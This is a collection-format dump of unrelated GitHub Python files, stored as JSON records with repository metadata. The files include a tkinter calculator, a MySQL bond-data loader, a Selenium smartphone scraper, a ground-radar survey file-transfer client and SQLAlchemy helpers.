activeforeground=\"yellow\").place(x=300, y=120)\n\nac = tk.Button(cal, text=\"AC\", command=clear, width=1, height=1, bd=2, bg=\"yellow\", fg=\"red\", activebackground=\"red\", activeforeground=\"yellow\").place(x=400, y=120)\n\nfour = tk.Button(cal, text=\"4\", command = lambda:text_insert(4), bg=\"gray\", bd=2).place(y=200)\n\nfive = tk.Button(cal, text=\"5\", command = lambda:text_insert(5), bg=\"gray\", bd=2).place(x=100, y=200)\n\nsix = tk.Button(cal, text=\"6\", command = lambda:text_insert(6), bg=\"gray\", bd=2).place(x=200, y=200)\n\nmul = tk.Button(cal, text=\"×\", command = lambda:text_insert(\"*\"), bg=\"lightgreen\", bd=2).place(x=300, y=200)\n\ndiv = tk.Button(cal, text=\"÷\", command = lambda:text_insert(\"/\"), bg=\"lightgreen\", bd=2).place(x=400, y=200)\n\none = tk.Button(cal, text=\"1\", command = lambda:text_insert(1), bg=\"gray\", bd=2).place(y=280)\n\ntwo = tk.Button(cal, text=\"2\", command = lambda:text_insert(2), bg=\"gray\", bd=2).place(x=100, y=280)\n\nthree = tk.Button(cal, text=\"3\", command = lambda:text_insert(3), bg=\"gray\", bd=2).place(x=200, y=280)\n\nplus = tk.Button(cal, text=\"+\", command= lambda:text_insert(\"+\"), bg=\"lightgreen\", bd=2).place(x=300, y=280)\n\nminus = tk.Button(cal, text=\"-\", command = lambda:text_insert(\"-\"), width=1, height=1, bg=\"lightgreen\", bd=2).place(x=400, y=280)\n\nzero = tk.Button(cal, text=\"0\", command = lambda:text_insert(0), bg=\"gray\", bd=2).place(y=360)\n\ndot = tk.Button(cal, text=\".\", command = lambda:text_insert(\".\"), bg=\"gray\", bd=2).place(x=100, y=360)\n\nequalTo = tk.Button(cal, text=\"=\", command = evaluate, bg=\"yellow\", fg=\"red\", activebackground=\"blue\", activeforeground=\"white\", bd=2).place(x=200, y=360)\n\nopenBrac = tk.Button(cal, text=\"(\", command = lambda:text_insert(\"(\"), bg=\"lightgreen\", bd=2).place(x=300, y=360)\n\ncloseBrac = tk.Button(cal, text=\")\", command = lambda:text_insert(\")\"), bg=\"lightgreen\", bd=2).place(x=400, y=360)\n\nexit = tk.Button(cal, text=\"EXIT\", fg=\"white\", command=quit, bg=\"red\", bd=2).place(x=350, y=440) \n\ncal.configure(background = \"black\")\ncal.maxsize(400,400)\ncal.minsize(400,400)\ncal.mainloop()","repo_name":"D-MythX/GUI_Cal","sub_path":"CalTk.py","file_name":"CalTk.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"19098011912","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport logging\nfrom typing import List\nfrom datetime import datetime, timedelta\n\nimport requests\nimport mysql.connector\nimport pandas as pd\n\nsys.path.append(os.getcwd())\n\nfrom conf import db_conf\n\nlxr_token = os.getenv(\"LXR_TOKEN\")\nnational_debt_table = \"national_debt\"\n\nclass Macro:\n \"\"\"用于获取宏观数据\n \"\"\"\n def __init__(self) -> None:\n self.conn = None\n\n \n def get_conn(self):\n if not self.conn:\n self.conn = mysql.connector.connect(\n host=db_conf.DB_HOST,\n port=db_conf.DB_PORT,\n user=db_conf.DB_USER,\n password=db_conf.DB_PASSWORD,\n database=\"finance_data\"\n )\n return self.conn\n\n\n def close_coon(self):\n if self.conn is not None:\n self.conn.close()\n return\n\n\n def init_national_debt_table(self):\n conn = self.get_conn()\n create_sql = \"\"\"\n CREATE TABLE IF NOT EXISTS `{}` (\n `id` INT AUTO_INCREMENT,\n `areaCode` VARCHAR(255),\n `date` VARCHAR(255),\n `tcm_m1` DOUBLE,\n `tcm_m3` DOUBLE,\n `tcm_m6` DOUBLE,\n `tcm_y1` DOUBLE,\n `tcm_y2` DOUBLE,\n `tcm_y3` DOUBLE,\n `tcm_y5` DOUBLE,\n `tcm_y7` DOUBLE,\n `tcm_y10` DOUBLE,\n `tcm_y20` DOUBLE,\n `tcm_y30` DOUBLE,\n PRIMARY KEY (`id`),\n UNIQUE KEY (`areaCode`, `date`)\n )ENGINE=InnoDB DEFAULT CHARSET=utf8;\n \"\"\".format(national_debt_table)\n cursor = conn.cursor()\n cursor.execute(create_sql)\n cursor.close()\n return\n\n\n def get_national_debt_data(self, area_code: str, start, end):\n start = datetime.strftime(start, \"%Y-%m-%d\")\n end = datetime.strftime(end, \"%Y-%m-%d\")\n url = \"https://open.lixinger.com/api/macro/national-debt\"\n params = {\n \"token\": lxr_token,\n \"areaCode\": area_code,\n \"startDate\": start,\n \"endDate\": end,\n \"metricsList\": [\n \"tcm_m1\",\n \"tcm_m3\",\n \"tcm_m6\",\n \"tcm_y1\",\n \"tcm_y2\",\n \"tcm_y3\",\n \"tcm_y5\",\n \"tcm_y7\",\n \"tcm_y10\",\n \"tcm_y20\",\n \"tcm_y30\"\n ]\n }\n r = requests.post(url, json=params)\n res = r.json()\n data = res[\"data\"]\n return data\n\n\n def insert_national_debt(self, data: List[dict]):\n insert_sql = \"\"\"\n insert into `{}` (\n areaCode,\n date,\n tcm_m1,\n tcm_m3,\n tcm_m6,\n tcm_y1,\n tcm_y2,\n tcm_y3,\n tcm_y5,\n tcm_y7,\n tcm_y10,\n tcm_y20,\n tcm_y30) \n values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \n ON DUPLICATE KEY UPDATE\n tcm_m1 = VALUES(tcm_m1),\n tcm_m3 = VALUES(tcm_m3),\n tcm_m6 = VALUES(tcm_m6),\n tcm_y1 = VALUES(tcm_y1),\n tcm_y2 = VALUES(tcm_y2),\n tcm_y3 = VALUES(tcm_y3),\n tcm_y5 = VALUES(tcm_y5),\n tcm_y7 = VALUES(tcm_y7),\n tcm_y10 = VALUES(tcm_y10),\n tcm_y20 = VALUES(tcm_y20),\n tcm_y30 = VALUES(tcm_y30)\n ; \n \"\"\".format(national_debt_table)\n conn = self.get_conn()\n cursor = conn.cursor()\n index_list = []\n for item in data:\n areaCode = item[\"areaCode\"]\n item[\"date\"] = item[\"date\"].split(\"T\")[0]\n index_list.append([\n areaCode,\n item[\"date\"],\n item.get(\"tcm_m1\", 0),\n item.get(\"tcm_m3\", 0),\n item.get(\"tcm_m6\", 0),\n item.get(\"tcm_y1\", 0),\n item.get(\"tcm_y2\", 0),\n item.get(\"tcm_y3\", 0),\n item.get(\"tcm_y5\", 0),\n item.get(\"tcm_y7\", 0),\n item.get(\"tcm_y10\", 0),\n item.get(\"tcm_y20\", 0),\n item.get(\"tcm_y30\", 0),\n ])\n try:\n cursor.executemany(insert_sql, index_list)\n conn.commit()\n except Exception as e:\n conn.rollback()\n logging.warning(\"insert national debt err:%s \", e)\n cursor.close()\n return\n\n\n def get_latest_update_date(self, table: str):\n sql = \"select `date` from `{}` order by `date` desc limit 1\".format(table)\n print(sql)\n cursor = self.get_conn().cursor()\n cursor.execute(sql)\n res = cursor.fetchone()\n if res:\n start = res[0]\n start = datetime.strptime(start, \"%Y-%m-%d\") + timedelta(days=1)\n return start\n return datetime.strptime(\"1990-01-01\", \"%Y-%m-%d\")\n\n\n def load_national_debt_data(self, area_code: str, rows: list):\n sql = \"select {} from '{}' where areaCode='{}'\".format(\",\".join(rows), national_debt_table, area_code)\n df = pd.read_sql(sql, self.get_conn())\n return df\n\n \n def insert_or_update_national_debt(self):\n self.init_national_debt_table()\n start = self.get_latest_update_date(national_debt_table)\n end = datetime.today()\n # 暂时只获取中债数据\n area_code = \"cn\"\n while start <= end:\n next_start = start + timedelta(days=3650)\n national_debt_data = self.get_national_debt_data(area_code, start, next_start)\n self.insert_national_debt(national_debt_data)\n start = next_start + timedelta(days=1)\n return\n\nif __name__ == \"__main__\":\n macro = Macro()\n macro.insert_or_update_national_debt()\n macro.close_coon()","repo_name":"AFreeCoder/quant-toolbox","sub_path":"scripts/dump_macro_data.py","file_name":"dump_macro_data.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"71721095257","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nfrom selenium.webdriver.firefox.options import Options\nfrom progress.bar import IncrementalBar\n\nfrom common import save\n\no = Options()\n\no.page_load_strategy = 'eager'\n\ndriver = webdriver.Firefox(options=o)\n\ndef get_page(page_num):\n driver.get(f'https://www.dns-shop.ru/catalog/17a8a01d16404e77/smartfony/?stock=now-today-tomorrow-later-out_of_stock&f[pqc]=68kur-kdf7y-o8r3o-y6ccf-1ccyzc&p={page_num}')\n\ndef find_urls():\n return [i.get_attribute('href') + 'characteristics/' \\\n for i in driver. \\\n find_elements(By.CSS_SELECTOR, '.catalog-product__name.ui-link')]\n\np_num = 1\n\nget_page(p_num)\n\ntemp_link_elements = find_urls()\nurls = []\n\nwhile len(temp_link_elements) > 0:\n urls += temp_link_elements\n temp_link_elements = find_urls()\n\n print(f'Page {p_num}')\n print(*temp_link_elements, sep='\\n', end='\\n\\n')\n\n p_num += 1\n get_page(p_num)\n\ni = 1\n\ndef load_info(page_url):\n info = {}\n try:\n driver.get(page_url)\n\n info_elements = driver.find_elements(By.CLASS_NAME, 'product-characteristics__spec')\n\n for el in info_elements:\n key = el.find_element(By.CLASS_NAME, 'product-characteristics__spec-title').text\n value = el.find_element(By.CLASS_NAME, 'product-characteristics__spec-value').text\n\n info[key] = value\n \n price = driver.find_elements(By.CLASS_NAME, 'product-buy__price')\n except Exception as e:\n pass\n\n price = price[0].text if price else None\n\n info['price'] = price\n info['url'] = page_url\n\n # print(info, end='\\n\\n')\n\n return info\n\ninfos = []\n\nbar = IncrementalBar('Parsing', max = len(urls))\n\ni = 1\nfor url in urls:\n infos.append(load_info(url))\n \n bar.next()\n\n i+=1\n if i % 100 == 0:\n save(infos, 'smartphones.csv')\n\ndriver.close()\ndriver.quit()\n\nsave(infos, 'smartphones.csv')","repo_name":"d-mour/KnowledgeGrpahCourse","sub_path":"Practice/2022/P41301/Parakhin_Chernousov_Smartphones/src/parse_smartphones.py","file_name":"parse_smartphones.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"40704021849","text":"# -*- coding: utf-8 -*-\n\n'''\nAuthor: Postprandial\nPurpose: Version2 of the Bob file:\nBob now answers all questions with 'Sure' and all shouting (caps) with 'Whoa, chill out!'\nlowercase questions or questions ending in whitespace are also answered with 'sure'.\nBob also still looks \nAll statements (upper & lowercase) are answered. \n'''\n\ndef hey(what):\n\t\n\tprompt=what.strip()\n\tanswer=''\n\t\n\tanswerFine=[' \\t',\"\"]\n\n\tif prompt in answerFine:\n\t\tanswer='Fine. Be that way!'\n\telif prompt.isupper():\n\t\tanswer='Whoa, chill out!'\n\telif prompt[-1]=='?':\n\t\tanswer='Sure.'\n\telse:\n\t\tanswer='Whatever.'\n\t\t\n\treturn answer\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/e521d476743c42ac9b3d37225576e9b9.py","file_name":"e521d476743c42ac9b3d37225576e9b9.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"20295425009","text":"from machine import LED\r\nimport utime as time\r\n\r\nRGB = LED(LED.RGB) #使用Lite 特有WS2812B(RGB LED) 驱动 \r\n\r\n#单颗控制 RGB = 0 LED 不亮\r\nRGB.rgb_write( 1 , 255 ,0 ,0) # 指定第1个 RGB灯 , R=255 /G=0 /B=0\r\nRGB.rgb_write( 2 , 0 ,255 ,0) # 指定第2个 RGB灯 , R=0 /G=255 /B=0\r\nRGB.rgb_write( 3 , 0 ,0 ,255) # 指定第3个 RGB灯 , R=0 /G=0 /B=255\r\n\r\ntime.sleep(1)\r\n#多颗 RGB LED 一起控制 (使用List )\r\n\r\nColor = [ [0,100,0] , [255,100 ,0] , [100 ,10 ,100] ] #指定前三个 RGB LED RGB颜色\r\nRGB.rgb_write( Color)\r\ntime.sleep(1)\r\n\r\n#rgb write前可控制亮度 1-100\r\nRGB.lightness(100)\r\nRGB.rgb_write( Color)\r\n\r\n#使用循环制作 RGB LED 渐渐变亮\r\nfor lightness in range(1,100,10): \r\n RGB.lightness(lightness)\r\n RGB.rgb_write( Color)\r\n time.sleep_ms(500)\r\n","repo_name":"richlink-tech/ePy-Lite","sub_path":"SampleCode/ExBoard_sampleCode/RGBLED_simple.py","file_name":"RGBLED_simple.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"22546761259","text":"\"\"\"This script processes a ros urdf file so that all paths specified\nusing ros package:// syntax are resolved properly, allowing one to use\nthe urdf file with pybullet directly.\n\nUsage\n python resolve_package_path_urdf.py [filename]\n\n\"\"\"\nimport sys\nimport rospkg\nimport re\n\nrospack = rospkg.RosPack()\nfilename = sys.argv[1]\nmatch = re.match(r'([a-zA-Z_]*).urdf', filename, re.M)\nif match is None:\n print(\"given file {:} is not an urdf file\".format(filename))\nfilename1 = match.group(1)\n\nwith open(filename, 'r') as f:\n doc = f.read()\n\n\nwhile True:\n # match package://[package_name]/\n match = re.search(r'package://([A-Za-z_]*)', doc, re.M)\n if match is None:\n break\n package_name = match.group(1)\n print(\"Found package: {:}\".format(package_name))\n package_path = rospack.get_path(package_name)\n doc = doc.replace(match.group(), package_path)\n\nfilename_new = \"{:}_res.urdf\".format(filename1)\nwith open(filename_new, 'w') as f:\n f.write(doc)\n print(\"Wrote a new urdf file at: {:}\".format(filename_new))\n","repo_name":"SimbaXu/infinite_interaction","sub_path":"data/urdf/resolve_package_path_urdf.py","file_name":"resolve_package_path_urdf.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15403953223","text":"\"\"\"\r\n14. Write a Python program to input player's name(string) and runs(int) scored for n\r\nnumber of players where n should be an input from the keyboard, Store the players’\r\ndetails in a dictionary called 'cricket'. After preparing the dictionary, input player's name\r\nand print the runs scored by him otherwise returns'-1' if player name not found.\r\n\"\"\"\r\nn=int(input(\"HOW MANY PLAYERS YOU CAN CHOOSE:\"))\r\nlist_name=[]\r\nlist_score=[]\r\nfor i in range(n):\r\n ele=input(\"ENTER THE PLAYER NAMES: \")\r\n list_name.append(ele)\r\nprint(list_name)\r\nfor i in range(n):\r\n ele2=int(input(\"ENTER THE SCORES: \"))\r\n list_score.append(ele2)\r\nprint(list_score)\r\nplayer_list=dict(zip(list_name,list_score))\r\nprint(player_list)\r\nnum=input(\"ENTER A PLAYER NAME: \")\r\nif num in player_list:\r\n print(player_list[num])\r\nelse:\r\n print(\"-1\")\r\n\r\n\r\n# player=input(\"ENTER THE PLAYER NAME:\")\r\n# if player in class_list:\r\n# print(class_list[player])\r\n# else:\r\n# print(\"-1\")\r\n # class_list[temp[0]] = int(temp[1])\r\n\r\n\r\n# # Displaying the dictionary\r\n# for key, value in class_list.items():\r\n# \tprint('Name: {}, Score: {}'.format(key, value))\r\n\r\n# lis_name=[\"MOHIBUL\",\"KOULIK\",\"BIKI\",\"SARTHAK\",\"ASIS\",\"KUNDAN\"]\r\n# lis_salary=[20,25,30,35,40,45]\r\n# Emp_lis=dict(zip(lis_name,lis_salary))\r\n# print(Emp_lis)","repo_name":"mohibul2000/MY_PROJECTS","sub_path":"assignments.py/Q14.py","file_name":"Q14.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4665005163","text":"import sys\nsys.path.append(\"../..\")\nfrom testcase_automaker.Utils.amazingutils import randoms\nfrom allpairspy import AllPairs\nimport random\nimport copy\n\n\nclass http_params_generator(object):\n '''\n\n\n >>> params_generator = http_params_generator(parameters_structure={'name': {'type': 'string', 'value': '','range':['张三','李四'], 'iscompulsory': True},\\\n 'phone': {'type': 'number', 'value': '', 'iscompulsory': True},\\\n 'claimant': {'type': 'object', 'value': {'name': {'type': 'string', 'value': '', 'iscompulsory': True}\\\n ,'phone': {'type': 'number', 'value': '', 'iscompulsory': True}}, 'iscompulsory': True},\\\n 'informations': {'type': 'array', 'value': [{'claimant': {'type': 'object', 'value': {'name': {'type': 'string', 'value': '', 'iscompulsory': True}\\\n ,'phone': {'type': 'number', 'value': '', 'iscompulsory': True}}, 'iscompulsory': True}},\\\n {'name': {'type': 'string', 'value': '', 'iscompulsory': True}}], 'iscompulsory': True}})\n\n >>> params_generator.get_params_num()\n 7\n >>> params_generator.generate_params_list()\n >>> type(params_generator.generated_params_list)\n \n >>> type(random.choice(params_generator.generated_params_list))\n \n >>> len(params_generator.generated_params_list)\n 7\n\n >>> params_generator = http_params_generator(parameters_structure={})\n >>> params_generator.get_params_num()\n 0\n >>> params_generator.generate_params_list()\n >>> type(params_generator.generated_params_list)\n \n >>> len(params_generator.generated_params_list)\n 0\n\n '''\n def __init__(self, parameters_structure, generated_params_list=None):\n self.parameters_structure = parameters_structure\n self.generated_params_list = generated_params_list\n\n # 生成参数组合列表\n def generate_params_list(self):\n parameters = http_params_generator.get_pairwise_list(self.get_params_num())\n params_usage_2d_list = []\n params_combo_list = []\n if len(parameters) > 1:\n for pairs in AllPairs(parameters):\n params_usage_2d_list.append(pairs)\n for params_usage_list in params_usage_2d_list:\n yield_params_usage_list = http_params_generator.yield_list(params_usage_list)\n raw_params_list = self.generate_params(parameters_usage_list=yield_params_usage_list)\n prepared_params_list = http_params_generator.get_value_dic(raw_params_list)\n params_combo_list.append(prepared_params_list)\n elif len(parameters) == 1: # 当只有一个参数的时候第三方库ALLPAIRS不支持\n yield_params_usage_list_true = http_params_generator.yield_list([True])\n yield_params_usage_list_false = http_params_generator.yield_list([False])\n raw_params_list_true = self.generate_params(parameters_usage_list=yield_params_usage_list_true)\n prepared_params_list_true = http_params_generator.get_value_dic(raw_params_list_true)\n raw_params_list_false = self.generate_params(parameters_usage_list=yield_params_usage_list_false)\n prepared_params_list_false = http_params_generator.get_value_dic(raw_params_list_false)\n params_combo_list.append(prepared_params_list_true)\n params_combo_list.append(prepared_params_list_false)\n self.generated_params_list = params_combo_list\n\n # 生成参数\n def generate_params(self, parameters_usage_list, parameters_structure=None):\n if parameters_structure is None:\n parameters_structure = copy.deepcopy(self.parameters_structure)\n for key, attribute in parameters_structure.items():\n type_name = attribute['type']\n if type_name.lower() == 'object':\n self.generate_params(parameters_structure=attribute['value'],\n parameters_usage_list=parameters_usage_list)\n continue\n if type_name.lower() == 'array':\n for value in attribute['value']:\n self.generate_params(parameters_structure=value,\n parameters_usage_list=parameters_usage_list)\n continue\n type_category = self.get_type_category(key)\n if 'range' in attribute and attribute['range']:\n generated_value = random.choice(attribute['range'])\n else:\n generated_value = self.get_parameter_random_value(type_name, type_category)\n\n if next(parameters_usage_list) or ('range' in attribute and attribute['range']):\n parameters_structure[key]['value'] = generated_value\n else:\n parameters_structure[key]['value'] = None\n return parameters_structure\n\n def get_params_num(self, parameters_structure=None, num=0):\n if parameters_structure is None:\n parameters_structure = copy.deepcopy(self.parameters_structure)\n for key, attribute in parameters_structure.items():\n type_name = attribute['type']\n if type_name.lower() == 'object':\n num += self.get_params_num(attribute['value'])\n continue\n if type_name.lower() == 'array':\n for value in attribute['value']:\n num += self.get_params_num(value)\n continue\n else:\n num += 1\n return num\n\n # 比较两个字典部分是否相等\n @staticmethod\n def remove_duplicated_dict_in_list(dic_list):\n for dic in dic_list:\n pass\n\n @staticmethod\n def yield_list(input_list):\n for i in input_list:\n yield i\n\n @staticmethod\n def get_pairwise_list(params_num):\n parameters = []\n for i in range(params_num):\n parameters.append([True, False])\n return parameters\n\n # 返回仅提取输入字典值中的value的值作为当前键的值的字典\n @staticmethod\n def get_value_dic(dic):\n new_dic = dict()\n for key, attribute in dic.items():\n if attribute['type'].lower() == 'object':\n new_dic[key] = http_params_generator.get_value_dic(attribute['value'])\n continue\n if attribute['type'].lower() == 'array':\n new_dic[key] = []\n for value in attribute['value']:\n new_dic[key].append(http_params_generator.get_value_dic(value))\n continue\n new_dic[key] = attribute['value']\n return new_dic\n\n # 根据键名生成数据类别\n @staticmethod\n def get_type_category(key):\n if key == 'phone':\n return 'chinese_mobile_phone'\n if key == 'name':\n return 'chinese_name'\n else:\n return 'default'\n\n # 根据数据类型以及数据类型的类别生成随机数据\n @staticmethod\n def get_parameter_random_value(type_name, type_category='default'):\n if type_name.lower() == 'boolean':\n return randoms.get_random_boolean()\n if type_name.lower() == 'number':\n return randoms.get_random_num(num_type=type_category)\n if type_name.lower() == 'string':\n return randoms.get_random_str(str_type=type_category)\n if type_name.lower() == 'date':\n return randoms.get_random_num(length=9)\n else:\n return None\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"amazingTest/testcase-automaker","sub_path":"testcase_automaker/interface/http_params_generator.py","file_name":"http_params_generator.py","file_ext":"py","file_size_in_byte":7920,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"68"} +{"seq_id":"2323769092","text":"import socket\nimport transfer_tools as tls\nimport time\nfrom datetime import datetime\nimport cv2\nimport os\nfrom tcp_latency import measure_latency\n\n# Read the config file first\nsource_config = \"/home/stanch/configs/source_config.txt\"\nhotspot_config = \"/home/stanch/configs/orbic_config.txt\"\nlog_file = \"/home/stanch/DataTransferMaster/suspects.log\"\n\ndef latency_check(loc_config: str) -> list:\n Host, Port, _, _ = tls.configReader(loc_config)\n latency_list = measure_latency(Host,Port)\n return latency_list\n\n\ndef clientHandler(mode: str):\n Host, Port, _, search_path = tls.configReader(source_config)\n print(\"Waiting for Connection to Host\")\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n\n s.connect((Host, Port))\n print(\"Connected to \", Host)\n\n # Prompt the user for the name of the survery and send it off\n #print(\"Sending Directory...\")\n #directory = \"DIR \" + input(\"Enter Survey Directory: \")\n #tls.gen_send(s,directory)\n #ACK_response = tls.gen_recv(s)\n\n # Or If were in testing mode use this for directory\n date_and_time = datetime.now().strftime(\"%m-%d_%H-%M\")\n directory = \"Perks_\" + date_and_time\n print(directory)\n tls.gen_send(s,\"DIR \"+directory)\n ACK_response = tls.gen_recv(s)\n\n # Currently the client is always running looking for new files\n # to be added to the survey, When a real survey is complete the\n # client must be manually stopped. \n\n while True:\n \n try:\n # Send the list of files on the source machine, need to recive the list of files on the server\n # In practice this should be todays_stack but since the \n # data set were working with is not \"live\" so to speak\n # We want the full stack\n\n print(\"Sending Source Stack...\")\n source_stack = tls.full_stack(search_path,\"DZT\")\n tls.gen_send(s,source_stack)\n request_stack = tls.gen_recv(s)\n\n if request_stack != []:\n print(\"Sending Files...\")\n # Create the associated report file\n with open(\"/home/stanch/public/reports/\"+directory+\"_Report.txt\", 'a+') as f:\n line = \"File,Mode,Size (Kb),T_p (nS),T_s (nS),T_t (ns),Rate (Mbit/s) \\n\"\n f.write(line)\n\n while request_stack != []:\n next_file = request_stack.pop()\n print(\"Sending \",next_file)\n next_dzt = tls.DZT_DAT(next_file)\n start_send_timer = time.monotonic_ns()\n tls.gen_send(s,next_dzt)\n ACK_response = tls.gen_recv(s)\n end_send_timer = time.monotonic_ns()\n b_scan = tls.gen_recv(s)\n end_total_timer = time.monotonic_ns()\n tls.gen_send(s, \"ACK\")\n \n # Get/Calucalte Metrics and write them to the report file\n name = next_file.split('.')[0] # File Name\n size = (len(next_dzt.dzt_contents)+len(next_dzt.realsense_contents))/1000 # File sizes in Kilobytes\n processing_time = tls.gen_recv(s) # Time to process in Ns\n sending_time = end_send_timer - start_send_timer # Time to send in Ns\n total_time = end_total_timer - start_send_timer # Total delay time in Ns\n sending_rate = (size*8)/(sending_time*(10**-9)*(10**3)) # Rate in Megabits/s\n with open(\"/home/stanch/public/reports/\"+directory+\"_Report.txt\", 'a+') as f:\n line = name + \",\" + mode + \",\" + str(size) + \",\" + str(processing_time) + \",\" + str(sending_time) + \",\" +str(total_time) + \",\" + str(sending_rate) + \"\\n\"\n f.write(line)\n\n\n print(\"/home/stanch/public/b_scans/\"+next_file.split('.')[0]+\".png\")\n cv2.imwrite(\"/home/stanch/public/b_scans/\"+next_file.split('.')[0]+\".png\", b_scan)\n\n print(\"Stack Empty\")\n \n # switch the commented lines in this block during real\n # opperation vs experimental setups\n else:\n # print(\"No requests, waiting for more files....\")\n # time.sleep(delay)\n break\n \n except KeyboardInterrupt:\n break\n \n # Close the socket\n print(\"Closing Connection...\")\n tls.gen_send(s,\"COM exit\")\n ACK_response = tls.gen_recv(s)\n\n return\n\ndef main():\n\n # check the current mode and run in that mode\n set_mode = \"4G\"\n print(\"Setting mode to\",set_mode)\n tls.set_mode(hotspot_config,set_mode)\n\n print(\"Checking network mode...\")\n mode = tls.check_mode(hotspot_config)\n if set_mode != mode:\n print(\"WARNING Current mode:\",mode,\"does not match the set mode\",set_mode)\n clientHandler(set_mode)\n\n # check the mode again at the end of the event, if the mode has changed flag the run as suspect\n post_mode = tls.check_mode(hotspot_config)\n if set_mode != post_mode:\n print(\"Mode does not match pre-execution value\")\n date_and_time = datetime.now().strftime(\"%m-%d_%H-%M\")\n with open(log_file, \"w+\") as f:\n f.writelines(\"run at\" + date_and_time + \"suspect, mode switched during execution\")\n \n while True:\n try:\n \n # Switch modes\n if set_mode == \"5G\":\n print(\"Switching to 4G\")\n tls.set_mode(hotspot_config,\"4G\")\n set_mode = \"4G\"\n elif set_mode == \"4G\":\n print(\"Switching to 5G\") \n tls.set_mode(hotspot_config,\"5G\")\n set_mode = \"5G\"\n else:\n raise Exception('Unknown Mode',set_mode)\n \n # Find the correct time to the next event at the quarter hour\n # create a time object\n now = datetime.now()\n # find the number of seconds to the next quarter hour\n sec_to_wait = (15 - (now.minute % 15))*60\n print(\"Waiting for next event....(\" + str(sec_to_wait/60)+ \" minutes)\")\n time.sleep(sec_to_wait)\n\n # Call the actual handler\n print(\"checking current mode...\")\n pre_mode = tls.check_mode(hotspot_config)\n if set_mode != pre_mode:\n print(\"WARNING Current mode:\",mode,\"does not match the set mode\",set_mode)\n clientHandler(set_mode)\n print(\"confirming constant mode...\")\n post_mode = tls.check_mode(hotspot_config)\n if pre_mode != post_mode or pre_mode != set_mode:\n date_and_time = datetime.now().strftime(\"%m-%d_%H-%M\")\n with open(log_file, \"w+\") as f:\n f.writelines(\"run at \",date_and_time,\" suspect, mode switched during execution\")\n\n except KeyboardInterrupt:\n break\n\n return\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"scotttanch/DataTransferMaster","sub_path":"Source.py","file_name":"Source.py","file_ext":"py","file_size_in_byte":7441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72782482455","text":"from flask_app import db\nfrom flask_app import session_maker\nfrom flask_app import flask_app\nfrom sqlalchemy import Table, inspect\nfrom sqlalchemy.dialects.mysql import insert\n\norigin_point_system_config = Table(\n 'origin_point_system_config',\n db.Model.metadata,\n db.Column('origin_point', db.String(30), db.ForeignKey('origin_point_desc.tag_name', ondelete='CASCADE'), primary_key=True),\n db.Column('system_config', db.Integer, db.ForeignKey('system_config.cid', ondelete='CASCADE'), primary_key=True)\n)\n\n\ndef clear_origin_point_system_table(unit):\n db.reflect(app=flask_app)\n db.get_engine().execute(\"SET foreign_key_checks = 0\")\n db.get_engine().execute(f\"DELETE FROM {'origin_point_system_config'} WHERE origin_point in (select tag_name FROM origin_point_desc WHERE unit={unit});\")\n db.get_engine().execute(\"SET foreign_key_checks = 1\")\n return 'ok'\n\n\n# 通过业务逻辑来限制origin point desc和point desc的联系,SQL上不做限制!!\n\ndef add_all(map_list):\n with session_maker() as db_session:\n db_session.add_all(map_list)\n db_session.commit()\n return \"ok\"\n\n\ndef add(relation_map):\n with session_maker() as db_session:\n db_session.add(relation_map)\n db_session.commit()\n return \"ok\"\n\n\ndef upsert_all(entity: type, records: list):\n \"\"\"\n 一次性将对应实体entity的多组数据进行upsert操作\n\n Args:\n entity (type): 表对应的实体类名\n records (list): 需要upsert的数据组成的列表\n\n Returns:\n bool: 返回是否upsert成功\n \"\"\"\n # 获取所有主键属性名称列表\n primary_keys = [col.name for col in inspect(entity).primary_key]\n # 获取全部字段名称列表\n total_fields = inspect(entity).c.keys()\n # 需要更新的字段名称列表\n update_keys = [key for key in total_fields if key not in primary_keys]\n \n insert_stmt = insert(entity).values(records)\n \n # 主键已存在时需要更新的列,其实就是除主键以外的全部列\n update_columns = {x.name: x for x in insert_stmt.inserted if x.name in update_keys}\n # 当遇上关系表这样的多对多并且全部字段组成复合主键时,不存在则插入,存在则更新全部字段\n if not len(update_columns):\n update_columns = {x.name: x for x in insert_stmt.inserted if x.name in total_fields}\n \n upsert_stmt = insert_stmt.on_duplicate_key_update(**update_columns)\n \n db.session.execute(upsert_stmt)\n db.session.commit()\n","repo_name":"G-AILab/PMS","sub_path":"flask_app/models/relation_map.py","file_name":"relation_map.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26909422085","text":"from copy import deepcopy\nfrom enum import Enum\nfrom typing import List, Optional\n\n# noinspection PyPackageRequirements\n# Exempting Bandit security issue (Using Element to parse untrusted XML data is known to be vulnerable to XML attacks)\n#\n# We don't currently allow untrusted/user-provided XML so this is not a risk\nfrom lxml.etree import ElementTree, fromstring, XMLSyntaxError # nosec\nfrom flask import Request, Response\nfrom owslib.ows import ExceptionReport\nfrom owslib.util import ServiceException\nfrom pycsw.core import admin\nfrom owslib.csw import namespaces as csw_namespaces\nfrom requests 